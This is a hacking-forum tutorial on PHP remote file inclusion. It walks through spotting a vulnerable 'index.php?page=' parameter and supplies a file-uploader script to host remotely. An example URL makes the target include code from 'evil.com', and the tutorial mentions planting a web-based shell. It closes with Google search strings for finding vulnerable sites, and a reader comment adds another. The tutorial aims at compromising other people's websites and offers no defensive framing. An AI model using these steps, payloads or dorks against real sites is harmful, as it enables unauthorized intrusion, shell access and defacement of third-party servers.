Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

Include Exploits


Include Exploits

By ghostghost | 94091 Reads |
0     0

In this article I will teach you the basics of Include Exploits. If you understand php then this will help, although not much.

When a site uses one page to call all the others around a basic template, they can become subject to exploitation under certain circumstances.

e.g. http://www.abc.com/index.php?page=news

To test if its vulnerable, try changing it to abc or whatever

e.g. http://www.abc.com/index.php?page=abc

If its vulnerable you should get an error like this:

Warning: main(abc.php): failed to open stream: No such file or directory in /home/dir/public_html/index.php on line 01

Ok, now we are in business. We now know that the script takes $_GET['page'] and adds .php, then includes it.

e.g. $page = $_GET ['page'] . ".php"; include ($page);

So, what we need now is an uploader to allow us to upload files on to there server. Here's some dazzling code written by cheesy himself:

<?php

if ( $userfile ) { @$res=copy($userfile,"$userfile_name"); if ( !$res ){ print "Upload failed! \n"; }else{ print "Upload of $userfile_name successful \n"; } } ?>

<FORM method=POST ENCTYPE="multipart/form-data"> File to Upload <INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="5000000"> <INPUT NAME="userfile" TYPE="file" size=35> <INPUT TYPE="submit"> </FORM> </HTML>

So, we need to host this code on a server that doesnt support php or just edit your htaccess so your server treats it as html or whatever. A good, simple free host that doesnt support php and is quick, easy and anonymous is cjb.net

So to exploit the page simply add your url for the uploader script:

e.g. http://www.abc.com/index.php?page=http://evil.com/uploader

Remember if the site adds .php only the page variable be sure to leave it off. Then the uploader pops up and you can install webadmin or a web-based shell.

To find vulnerable sites, we can use our best friend, google. Good searches include:

inurl:"index.php?page=downloads" inurl:"index.php?page=news.php"

Be imaginative :)

Thanks for reading and i hope you've learnt something new.

Will.

Comments
sam207's avatar
sam207 15 years ago

"inurl:.php?page=" is the good dork to use I think.. Its nice article though I don't feel its awesome.. Very Good I choose..